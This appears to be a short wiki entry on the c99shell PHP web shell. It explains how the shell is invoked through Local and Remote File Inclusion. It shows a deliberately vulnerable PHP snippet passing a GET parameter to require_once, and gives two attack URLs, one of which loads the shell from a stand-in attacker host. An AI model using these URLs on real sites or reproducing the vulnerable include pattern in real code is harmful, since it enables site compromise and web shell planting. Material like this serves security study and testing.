C99Shell
Jump to navigation
Jump to search
Description
c99shell is a one file PHP script that can be called:
- locally via a Local File Inclusion (LFI) attack if the file has been copied on a compromised machine
- remotely via a Remote File Inclusion (RFI) attack is the web application is vulnerable to such an attack.
Download
Usage
Local File Inclusion (LFI)
Suppose there is a vulnerable web site that contains the following code (index.php):
<?php if(isset($_GET["page"])) { require_once($_GET["page"]); } ... ?>
You can exploit a Local File Inclusion (LFI) attack by calling C99shell this way:
http://www.somevulnerablesite/index.php?page=c99.txt
Remote File Inclusion (RFI)
Suppose there is a vulnerable web site that contains the following code (index.php):
<?php if(isset($_GET["page"])) { require_once($_GET["page"]); } ... ?>
You can exploit a Remote File Inclusion (RFI) attack by calling C99shell this way:
http://www.somevulnerablesite/index.php?page=http://www.hackerssite/phpshells/c99.txt